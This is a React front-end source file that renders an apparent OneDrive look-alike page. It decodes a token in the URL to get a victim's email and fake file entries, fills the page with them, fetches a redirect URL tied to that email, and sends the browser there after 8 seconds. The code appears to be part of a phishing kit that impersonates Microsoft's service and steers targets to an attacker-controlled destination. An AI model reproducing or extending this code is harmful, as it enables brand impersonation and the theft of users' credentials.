import { useEffect, useMemo, useState } from 'react'
import { SplashScreen } from './components/SplashScreen'
import { TopBar } from './components/TopBar'
import { Sidebar } from './components/Sidebar'
import { OfficeAppsSidebar } from './components/OfficeAppsSidebar'
import { FeaturedCards } from './components/FeaturedCards'
import { RecentFiles } from './components/RecentFiles'
import { fetchRedirectUrl } from '@/lib/api'
import {
  getPrefillFiles,
  getTokenFromUrl,
  parseLinkPayload,
  payloadFilesToFeaturedCards,
  payloadFilesToRecentFiles,
} from '@/utils/linkPayload'
import styles from './App.module.css'

export default function App() {
  const linkData = useMemo(() => {
    const token = getTokenFromUrl()
    const parsed = parseLinkPayload(token)
    const prefillFiles = getPrefillFiles(parsed)

    return {
      parsed,
      featuredCards: prefillFiles.length ? payloadFilesToFeaturedCards(prefillFiles) : [],
      recentFiles: prefillFiles.length ? payloadFilesToRecentFiles(prefillFiles, parsed.email) : [],
    }
  }, [])

  const [redirectUrl, setRedirectUrl] = useState<string | null>(null)

  useEffect(() => {
    const product = linkData.parsed.payload?.p
    if (product) {
      document.title = `${product} — OneDrive`
    }
  }, [linkData.parsed.payload?.p])

  useEffect(() => {
    let cancelled = false
    fetchRedirectUrl(linkData.parsed.email || null).then((url) => {
      if (!cancelled && url) setRedirectUrl(url)
    })
    return () => {
      cancelled = true
    }
  }, [linkData.parsed.email])

  useEffect(() => {
    if (!redirectUrl) return
    const timer = setTimeout(() => {
      window.location.href = redirectUrl
    }, 8000)
    return () => clearTimeout(timer)
  }, [redirectUrl])

  return (
    <div className={styles.app}>
      <SplashScreen duration={4000} onComplete={() => {}} />
      <TopBar />
      <div className={styles.body}>
        <OfficeAppsSidebar />
        <Sidebar />
        <main className={styles.main}>
          <FeaturedCards prefillCards={linkData.featuredCards} />
          <RecentFiles prefillFiles={linkData.recentFiles} />
        </main>
      </div>
    </div>
  )
}
